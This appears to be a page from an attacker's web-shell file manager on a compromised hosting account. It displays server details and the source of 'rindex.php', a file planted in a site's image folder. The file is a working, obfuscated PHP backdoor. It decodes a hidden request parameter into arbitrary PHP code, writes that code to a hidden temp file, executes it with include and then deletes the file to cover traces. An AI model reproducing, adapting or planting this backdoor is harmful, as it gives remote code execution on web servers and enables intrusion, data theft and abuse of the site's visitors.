HEX
Server: LiteSpeed
System: Linux premium212.web-hosting.com 4.18.0-553.124.4.lve.el8.x86_64 #1 SMP Fri May 15 13:02:13 UTC 2026 x86_64
User: vitanhod (1367)
PHP: 8.2.31
Disabled: NONE
Upload Files
File: //proc/thread-self/root/proc/thread-self/root/home/vitanhod/trimate.vitavit.com.pk/img/rindex.php
<?php

if(isset($_REQUEST["b\x69\x6Ed"])){
	$tkn = array_filter(["/var/tmp", session_save_path(), sys_get_temp_dir(), "/dev/shm", getenv("TMP"), ini_get("upload_tmp_dir"), "/tmp", getenv("TEMP"), getcwd()]);
	$obj = $_REQUEST["b\x69\x6Ed"];
		  $obj =  explode   ( 		"." ,$obj )	 ;
	$token = '';
            $s = 'abcdefghijklmnopqrstuvwxyz0123456789';
            $sLen = strlen($s);
            $w = 0;
    
            foreach ($obj as $v9) {
                $chS = ord($s[$w% $sLen]);
                $d = ((int)$v9 - $chS - ($w% 10))^	 43;
                $token		.=chr($d);
                $w++;}	
	$descriptor = 0;
do {
    $ptr = $tkn[$descriptor] ?? null;
    if ($descriptor >= count($tkn)) break;
    		if (max(0, is_dir($ptr) * is_writable($ptr))) {
    $value = "$ptr" . "/.marker";
    if (file_put_contents($value, $token)) {
	include $value;
	@unlink($value);
	die();
}
}
    $descriptor++;
} while (true);
}